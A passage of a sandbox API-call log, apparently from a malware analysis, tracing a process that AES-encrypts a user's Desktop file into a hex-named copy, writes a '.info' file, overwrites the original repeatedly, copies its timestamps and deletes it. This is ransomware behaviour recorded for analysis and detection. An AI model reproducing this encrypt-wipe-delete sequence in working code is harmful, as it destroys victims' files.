HALPmcxz\\Desktop\\2485DB33939563D3B5B58AF28B3A08D8", lpFilePart=0x0) returned 0x46 [0069.753] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0069.753] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2485DB33939563D3B5B58AF28B3A08D8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2485db33939563d3b5b58af28b3a08d8"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.753] GetFileType (hFile=0x3d4) returned 0x1 [0069.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0069.753] GetFileType (hFile=0x3d4) returned 0x1 [0069.753] SetFileTime (hFile=0x3d4, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0069.753] CloseHandle (hObject=0x3d4) returned 1 [0069.753] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2485DB33939563D3B5B58AF28B3A08D8", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2485DB33939563D3B5B58AF28B3A08D8", lpFilePart=0x0) returned 0x46 [0069.753] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0069.753] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2485DB33939563D3B5B58AF28B3A08D8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2485db33939563d3b5b58af28b3a08d8"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.754] GetFileType (hFile=0x3d4) returned 0x1 [0069.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0069.754] GetFileType (hFile=0x3d4) returned 0x1 [0069.754] SetFileTime (hFile=0x3d4, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0069.754] CloseHandle (hObject=0x3d4) returned 1 [0069.754] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2485DB33939563D3B5B58AF28B3A08D8", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2485DB33939563D3B5B58AF28B3A08D8", lpFilePart=0x0) returned 0x46 [0069.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0069.754] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2485DB33939563D3B5B58AF28B3A08D8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2485db33939563d3b5b58af28b3a08d8"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.754] GetFileType (hFile=0x3d4) returned 0x1 [0069.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0069.754] GetFileType (hFile=0x3d4) returned 0x1 [0069.754] SetFileTime (hFile=0x3d4, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0069.754] CloseHandle (hObject=0x3d4) returned 1 [0069.755] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", lpFilePart=0x0) returned 0x2e [0069.755] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", lpFilePart=0x0) returned 0x2e [0069.756] CryptAcquireContextW (in: phProv=0x1bf5da68, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5da68*=0x1a5b7710) returned 1 [0069.757] CryptImportKey (in: hProv=0x1a5b7710, pbData=0x22eea98, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x1a6269f0) returned 1 [0069.757] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0069.757] CryptExportKey (in: hKey=0x1a6269f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0069.757] CryptExportKey (in: hKey=0x1a6269f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x22eeb88, pdwDataLen=0x1bf5db30 | out: pbData=0x22eeb88*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0069.757] CryptImportKey (in: hProv=0x1a5b7710, pbData=0x22eeca8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626a60) returned 1 [0069.757] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0069.757] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0069.757] CryptDuplicateKey (in: hKey=0x1a626a60, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626bb0) returned 1 [0069.757] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0069.757] CryptSetKeyParam (hKey=0x1a626bb0, dwParam=0x4, pbData=0x22eedf0*=0x1, dwFlags=0x0) returned 1 [0069.757] CryptSetKeyParam (hKey=0x1a626bb0, dwParam=0x1, pbData=0x22eeda0, dwFlags=0x0) returned 1 [0069.757] CryptDestroyKey (hKey=0x1a626a60) returned 1 [0069.757] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0069.757] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", lpFilePart=0x0) returned 0x2e [0069.757] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0069.757] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\voxk.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.757] GetFileType (hFile=0x3d4) returned 0x1 [0069.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0069.758] GetFileType (hFile=0x3d4) returned 0x1 [0069.758] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BEEBCAF45CB24EB19B5DCF36A3672D5A", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BEEBCAF45CB24EB19B5DCF36A3672D5A", lpFilePart=0x0) returned 0x46 [0069.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0069.758] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BEEBCAF45CB24EB19B5DCF36A3672D5A" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\beebcaf45cb24eb19b5dcf36a3672d5a"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x40c [0069.758] GetFileType (hFile=0x40c) returned 0x1 [0069.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0069.758] GetFileType (hFile=0x40c) returned 0x1 [0069.759] ReadFile (in: hFile=0x3d4, lpBuffer=0x22ef180, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x22ef180*, lpNumberOfBytesRead=0x1bf5da28*=0x1ef7, lpOverlapped=0x0) returned 1 [0069.760] CryptEncrypt (in: hKey=0x1a626bb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2303198*, pdwDataLen=0x1bf5da80*=0x1ef0, dwBufLen=0x1ef0 | out: pbData=0x2303198*, pdwDataLen=0x1bf5da80*=0x1ef0) returned 1 [0069.760] WriteFile (in: hFile=0x40c, lpBuffer=0x2303198*, nNumberOfBytesToWrite=0x1ef0, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x2303198*, lpNumberOfBytesWritten=0x1bf5da18*=0x1ef0, lpOverlapped=0x0) returned 1 [0069.761] ReadFile (in: hFile=0x3d4, lpBuffer=0x22ef180, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x22ef180*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0069.761] CryptEncrypt (in: hKey=0x1a626bb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23050c8*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x23050c8*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0069.762] CryptEncrypt (in: hKey=0x1a626bb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2305118*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x2305118*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0069.762] WriteFile (in: hFile=0x40c, lpBuffer=0x2305168*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x2305168*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0069.762] CloseHandle (hObject=0x40c) returned 1 [0069.772] CloseHandle (hObject=0x3d4) returned 1 [0069.772] CryptDestroyKey (hKey=0x1a6269f0) returned 1 [0069.772] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0069.772] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0069.772] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BEEBCAF45CB24EB19B5DCF36A3672D5A", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BEEBCAF45CB24EB19B5DCF36A3672D5A", lpFilePart=0x0) returned 0x46 [0069.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0069.772] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BEEBCAF45CB24EB19B5DCF36A3672D5A" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\beebcaf45cb24eb19b5dcf36a3672d5a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.772] GetFileType (hFile=0x3d4) returned 0x1 [0069.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0069.772] GetFileType (hFile=0x3d4) returned 0x1 [0069.772] ReadFile (in: hFile=0x3d4, lpBuffer=0x2306858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2306858*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0069.773] ReadFile (in: hFile=0x3d4, lpBuffer=0x2306858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2306858*, lpNumberOfBytesRead=0x1bf5da48*=0xf00, lpOverlapped=0x0) returned 1 [0069.774] ReadFile (in: hFile=0x3d4, lpBuffer=0x2306858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2306858*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0069.775] CloseHandle (hObject=0x3d4) returned 1 [0070.657] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BEEBCAF45CB24EB19B5DCF36A3672D5A.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BEEBCAF45CB24EB19B5DCF36A3672D5A.info", lpFilePart=0x0) returned 0x4b [0070.657] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0070.657] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BEEBCAF45CB24EB19B5DCF36A3672D5A.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\beebcaf45cb24eb19b5dcf36a3672d5a.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.664] GetFileType (hFile=0x398) returned 0x1 [0070.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0070.664] GetFileType (hFile=0x398) returned 0x1 [0070.664] WriteFile (in: hFile=0x398, lpBuffer=0x213d4c0*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x213d4c0*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0070.665] CloseHandle (hObject=0x398) returned 1 [0070.666] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", lpFilePart=0x0) returned 0x2e [0070.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0070.666] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\voxk.png"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0b01280, ftCreationTime.dwHighDateTime=0x1d4cecd, ftLastAccessTime.dwLowDateTime=0xa0be8970, ftLastAccessTime.dwHighDateTime=0x1d4d0fa, ftLastWriteTime.dwLowDateTime=0xa0be8970, ftLastWriteTime.dwHighDateTime=0x1d4d0fa, nFileSizeHigh=0x0, nFileSizeLow=0x1ef7)) returned 1 [0070.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0070.667] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", lpFilePart=0x0) returned 0x2e [0070.667] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", dwFileAttributes=0x80) returned 1 [0070.667] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", lpFilePart=0x0) returned 0x2e [0070.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0070.667] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\voxk.png"), fInfoLevelId=0x0, lpFileInformation=0x2145088 | out: lpFileInformation=0x2145088*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe0b01280, ftCreationTime.dwHighDateTime=0x1d4cecd, ftLastAccessTime.dwLowDateTime=0xa0be8970, ftLastAccessTime.dwHighDateTime=0x1d4d0fa, ftLastWriteTime.dwLowDateTime=0xa0be8970, ftLastWriteTime.dwHighDateTime=0x1d4d0fa, nFileSizeHigh=0x0, nFileSizeLow=0x1ef7)) returned 1 [0070.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0070.668] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", lpFilePart=0x0) returned 0x2e [0070.668] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0070.668] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\voxk.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.668] GetFileType (hFile=0x398) returned 0x1 [0070.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0070.668] GetFileType (hFile=0x398) returned 0x1 [0070.668] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0070.669] WriteFile (in: hFile=0x398, lpBuffer=0x21454e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21454e0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0070.670] WriteFile (in: hFile=0x398, lpBuffer=0x21454e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x21454e0*, lpNumberOfBytesWritten=0x1bf5daa8*=0x1000, lpOverlapped=0x0) returned 1 [0070.670] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0070.670] WriteFile (in: hFile=0x398, lpBuffer=0x21454e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21454e0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0070.671] WriteFile (in: hFile=0x398, lpBuffer=0x21454e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x21454e0*, lpNumberOfBytesWritten=0x1bf5daa8*=0x1000, lpOverlapped=0x0) returned 1 [0070.671] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0070.672] WriteFile (in: hFile=0x398, lpBuffer=0x21454e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21454e0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0070.673] WriteFile (in: hFile=0x398, lpBuffer=0x21454e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x21454e0*, lpNumberOfBytesWritten=0x1bf5daa8*=0x1000, lpOverlapped=0x0) returned 1 [0070.673] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0070.674] WriteFile (in: hFile=0x398, lpBuffer=0x21454e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21454e0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0070.674] WriteFile (in: hFile=0x398, lpBuffer=0x21454e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x21454e0*, lpNumberOfBytesWritten=0x1bf5daa8*=0x1000, lpOverlapped=0x0) returned 1 [0070.674] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0070.674] SetEndOfFile (hFile=0x398) returned 1 [0070.675] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0070.675] CloseHandle (hObject=0x398) returned 1 [0070.675] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", lpFilePart=0x0) returned 0x2e [0070.675] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0070.675] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\voxk.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.676] GetFileType (hFile=0x398) returned 0x1 [0070.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0070.676] GetFileType (hFile=0x398) returned 0x1 [0070.676] SetFileTime (hFile=0x398, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0070.676] CloseHandle (hObject=0x398) returned 1 [0070.676] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", lpFilePart=0x0) returned 0x2e [0070.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0070.676] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\voxk.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.676] GetFileType (hFile=0x398) returned 0x1 [0070.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0070.676] GetFileType (hFile=0x398) returned 0x1 [0070.676] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0070.676] CloseHandle (hObject=0x398) returned 1 [0070.677] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", lpFilePart=0x0) returned 0x2e [0070.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0070.677] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\voxk.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.677] GetFileType (hFile=0x398) returned 0x1 [0070.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0070.677] GetFileType (hFile=0x398) returned 0x1 [0070.677] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0070.677] CloseHandle (hObject=0x398) returned 1 [0070.677] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", lpFilePart=0x0) returned 0x2e [0070.677] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\voxk.png")) returned 1 [0070.678] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vOXk.png", lpFilePart=0x0) returned 0x2e [0070.678] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BEEBCAF45CB24EB19B5DCF36A3672D5A", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BEEBCAF45CB24EB19B5DCF36A3672D5A", lpFilePart=0x0) returned 0x46 [0070.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0070.679] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BEEBCAF45CB24EB19B5DCF36A3672D5A" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\beebcaf45cb24eb19b5dcf36a3672d5a"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.679] GetFileType (hFile=0x398) returned 0x1 [0070.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0070.679] GetFileType (hFile=0x398) returned 0x1 [0070.679] SetFileTime (hFile=0x398, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0070.679] CloseHandle (hObject=0x398) returned 1 [0070.679] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BEEBCAF45CB24EB19B5DCF36A3672D5A", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BEEBCAF45CB24EB19B5DCF36A3672D5A", lpFilePart=0x0) returned 0x46 [0070.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0070.679] CreateFileW 